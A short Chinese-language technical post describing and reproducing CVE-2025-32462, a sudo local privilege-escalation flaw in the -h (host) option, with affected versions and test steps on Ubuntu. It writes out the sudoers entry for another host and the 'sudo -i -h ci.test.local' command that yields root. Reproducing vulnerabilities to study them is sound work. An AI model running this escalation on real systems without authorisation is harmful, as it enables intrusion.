> 技术文档 > CVE-2025-32462-Linux sudo本地提权漏洞复现

CVE-2025-32462-Linux sudo本地提权漏洞复现


一、漏洞介绍

Linux 是一个免费开源的类Unix操作系统,广泛应用于服务器、嵌入式设备和云计算平台。
sudo 是 Linux 系统中管理权限的核心工具,允许授权用户临时获取 root 或其他用户权限执行命令,既保障系统安全又便于操作审计。

近日,Linux sudo 工具公开存在两个紧密关联的本地提权漏洞(CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户权限提升至 root 权限。

CVE-2025-32462 Linux sudo 本地权限提升漏洞在于 sudo 的 -h(--host)选项存在缺陷,该选项本应与 -l(--list)配合使用来查询远程主机权限,但实际未严格限制其仅用于查询功能,导致攻击者可能结合命令执行或文件编辑操作实现本地提权。

二、影响范围

CVE-2025-32462   1.8.8 < Sudo版本 <= 1.9.17

三、漏洞复现

使用的环境为Ubuntu24.04,自带的sudo,版本为1.9.15p5

此时执行sudo -i等提示需要输入密码和权限不够

编辑sudoers文件

visudo /etc/sudoers

添加:ubuntu     ci.test.local  = NOPASSWD:ALL

此时尝试执行命令可提权成功

sudo -h ci.test.local 命令

sudo -i -h ci.test.local

Ubuntu 22.04 sudo 版本1.8.31,测试同样成功